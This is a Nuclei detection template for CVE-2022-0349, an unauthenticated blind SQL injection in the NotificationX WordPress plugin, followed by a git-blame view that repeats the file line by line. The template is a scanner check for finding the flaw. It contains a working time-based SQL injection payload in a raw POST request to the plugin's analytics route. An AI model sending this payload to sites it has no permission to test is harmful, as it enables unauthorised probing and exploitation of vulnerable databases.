nuclei-templates/cves/2022/CVE-2022-0349.yaml

id: CVE-2022-0349

info:
  name: NotificationX WordPress plugin < 2.3.9 - SQL Injection
  author: edoardottt
  severity: critical
  description: |
    The NotificationX WordPress plugin before 2.3.9 does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection.
  reference:
    - https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a
    - https://wordpress.org/plugins/notificationx/advanced/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0349
  classification:
    cve-id: CVE-2022-0349
  metadata:
    verified: true
  tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,notificationx

requests:
  - raw:
      - |
        @timeout: 15s
        POST /?rest_route=/notificationx/v1/analytics HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        nx_id=sleep(6) -- x

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(body, "\"data\":{\"success\":true}")'
        condition: and
Revert "Update CVE-2022-0349.yaml" This reverts commit 3517adc985dfb6ce9160c418c413d59abf7218a7. 2022-10-04 08:58:45 +00:00			`id: CVE-2022-0349`
Add CVE-2022-0349 2022-10-01 13:26:09 +00:00
			`info:`
Revert "Update CVE-2022-0349.yaml" This reverts commit 3517adc985dfb6ce9160c418c413d59abf7218a7. 2022-10-04 08:58:45 +00:00			`name: NotificationX WordPress plugin < 2.3.9 - SQL Injection`
Add CVE-2022-0349 2022-10-01 13:26:09 +00:00			`author: edoardottt`
			`severity: critical`
			`description: \|`
Revert "Update CVE-2022-0349.yaml" This reverts commit 3517adc985dfb6ce9160c418c413d59abf7218a7. 2022-10-04 08:58:45 +00:00			`The NotificationX WordPress plugin before 2.3.9 does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection.`
Add CVE-2022-0349 2022-10-01 13:26:09 +00:00			`reference:`
Revert "Update CVE-2022-0349.yaml" This reverts commit 3517adc985dfb6ce9160c418c413d59abf7218a7. 2022-10-04 08:58:45 +00:00			`- https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a`
Update CVE-2022-0349.yaml 2022-11-15 11:55:02 +00:00			`- https://wordpress.org/plugins/notificationx/advanced/`
Revert "Update CVE-2022-0349.yaml" This reverts commit 3517adc985dfb6ce9160c418c413d59abf7218a7. 2022-10-04 08:58:45 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2022-0349`
Add CVE-2022-0349 2022-10-01 13:26:09 +00:00			`classification:`
Revert "Update CVE-2022-0349.yaml" This reverts commit 3517adc985dfb6ce9160c418c413d59abf7218a7. 2022-10-04 08:58:45 +00:00			`cve-id: CVE-2022-0349`
Update CVE-2022-0349.yaml 2022-11-15 11:55:02 +00:00			`metadata:`
			`verified: true`
			`tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,notificationx`
Add CVE-2022-0349 2022-10-01 13:26:09 +00:00
			`requests:`
Revert "Update CVE-2022-0349.yaml" This reverts commit 3517adc985dfb6ce9160c418c413d59abf7218a7. 2022-10-04 08:58:45 +00:00			`- raw:`
			`- \|`
Update CVE-2022-0349.yaml 2022-11-16 09:39:24 +00:00			`@timeout: 15s`
Revert "Update CVE-2022-0349.yaml" This reverts commit 3517adc985dfb6ce9160c418c413d59abf7218a7. 2022-10-04 08:58:45 +00:00			`POST /?rest_route=/notificationx/v1/analytics HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

Update CVE-2022-0349.yaml 2022-11-15 11:55:02 +00:00			`nx_id=sleep(6) -- x`
Add CVE-2022-0349 2022-10-01 13:26:09 +00:00
			`matchers:`
			`- type: dsl`
			`dsl:`
Update CVE-2022-0349.yaml 2022-11-15 11:55:02 +00:00			`- 'duration>=6'`
			`- 'status_code == 200'`
			`- 'contains(body, "\"data\":{\"success\":true}")'`
			`condition: and`